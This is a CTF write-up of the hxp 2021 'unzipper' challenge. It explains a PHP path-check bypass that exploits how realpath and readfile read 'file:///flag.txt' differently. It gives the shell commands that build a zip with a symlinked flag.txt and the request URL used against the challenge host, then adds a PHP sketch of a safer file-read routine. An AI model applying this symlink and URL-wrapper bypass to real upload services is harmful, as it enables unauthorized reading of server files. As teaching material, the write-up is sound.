
Useful characteristics of PHP functions:

  • The function realpath will expand symbolic links in the given path.
  • The function readfile accepts a URL as the path of the file to read.

Therefore, readfile treats file:///flag.txt as a URL pointing at /flag.txt, while realpath treats it as the file flag.txt in a directory named file:.

Making flag.txt in that directory a symbolic link removes the string flag from the result of realpath, which bypasses the check.

To exploit this, create the file file_flag.zip with these commands:

mkdir file:
cd file:
touch meow.txt
ln -s meow.txt flag.txt
cd ..
zip -ry file_flag.zip file:

Then upload the file and access http://65.108.176.76:8200/?file=file:///flag.txt to get the flag.
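
The mismatch goes away when the path is resolved once and that same resolved path is both checked and read. The sketch below is an added example, not the challenge's code; safe_read() and the temporary sandbox layout are hypothetical, and it assumes a POSIX filesystem where a directory may be named file:.

```php
<?php
// Added example: safe_read() and the sandbox layout are hypothetical names.

// Resolve the user-supplied name once, apply the policy to the resolved
// path, and read that same resolved path, so check and read cannot disagree.
function safe_read(string $base, string $name): ?string
{
    // Refuse names a stream wrapper could claim (file://, php://, http://).
    if (strpos($name, '://') !== false) {
        return null;
    }
    $baseReal = realpath($base);
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false || $real === false) {
        return null;
    }
    // Confine the resolved target (symbolic links already expanded)
    // to the extraction directory.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    if (!is_file($real)) {
        return null;
    }
    // Read the path that was checked, never the raw $name.
    return file_get_contents($real);
}

// Constructed sandbox mirroring the archive layout described above.
$box = sys_get_temp_dir() . '/unzip_' . bin2hex(random_bytes(4));
mkdir("$box/file:", 0700, true);
file_put_contents("$box/file:/meow.txt", "harmless\n");
symlink('meow.txt', "$box/file:/flag.txt");

// The name used in the request above: contains "://".
var_dump(safe_read($box, 'file:///flag.txt'));
// Same directory entry without the wrapper form: resolves to meow.txt
// inside the sandbox, and that resolved file is what gets read.
var_dump(safe_read($box, 'file:/flag.txt'));
// A name that does not resolve inside the sandbox.
var_dump(safe_read($box, '../../etc/passwd'));
```

Rejecting symbolic-link entries at extraction time closes the same gap one step earlier, since the archive above only works because zip -y stores the link instead of the file it points to.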

Original writeup (https://mikecat.github.io/ctf-writeups/2021/20211218_hxp_CTF_2021/WEB/unzipper/#en).